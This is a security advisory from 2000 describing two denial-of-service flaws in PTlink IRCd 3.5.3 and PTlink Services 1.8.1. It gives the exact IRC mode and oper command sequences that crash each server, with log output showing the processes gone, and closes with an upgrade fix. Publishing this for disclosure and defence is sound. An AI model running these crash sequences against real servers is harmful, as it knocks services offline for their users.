Vulnerabilities found in PTlink (IRCd) and PTlink (Services)
29 Nov. 2000
Summary
Two vulnerabilities have been found in PTlink's IRCd Server and Services server. The vulnerabilities allow remote attackers to cause the IRCd server or Services server to crash. This can be used to cause a Denial of Service attack against the product.
Vulnerable systems:
PTlink IRCd version 3.5.3
PTlink IRCd services version 1.8.1
Immune systems:
PTlink IRCd version 5.7.1
PTlink IRCd services version 2.15.0
Exploit: Crash Services server:
Connect to the IRC server. Then, do the following:
Issue a
/mode <your nick> +owgscfxeb
And a
/oper <oper nick> <something, doesn't really matter>
command.
This will cause the server to:
/mode <your nick> +owgscfxeb
[23:25] *** whocares sets mode: +wgsx
/oper <oper nick> <something, doesn't really matter>
-
Password Incorrect
-
[23:25] -freddy.userfriendly- Your attempt has been logged.
-
[23:26] -freddy.userfriendly- *** Notice -- Connection to services.freddy.userfriendly[*@192.168.0.3] activated.
-
[23:26] -freddy.userfriendly- *** Notice -- Lost connection to services.freddy.userfriendly[192.168.0.3]:Broken pipe
-
[root@freddy wildcoyote]# ps aux | grep services
[root@freddy wildcoyote]#
Crash IRCd server:
Connect to the IRC server. Then, do the following:
Issue a
/oper <oper nick> <something, doesn't really matter>
And a
/mode <your nick> +owgscfxeb
command.
This will cause the server to:
[23:43] -NickServ- This nickname is registered and protected. If it is your
[23:43] -NickServ- nick, type /NickServ IDENTIFY password. Otherwise,
[23:43] -NickServ- please choose a different nick.
[23:43] -NickServ- If you do not change within one minute, your nick will be changed.
/oper wildcoyote whocares
Password Incorrect
[23:43] -freddy.userfriendly- Your attempt has been logged.
/mode mynick +owgscfxeb
[23:44] *** Disconnected
[root@freddy wildcoyote]# ps aux | grep ircd
[root@freddy wildcoyote]#
Fix:
Upgrade to the latest version of IRCd and Services server.
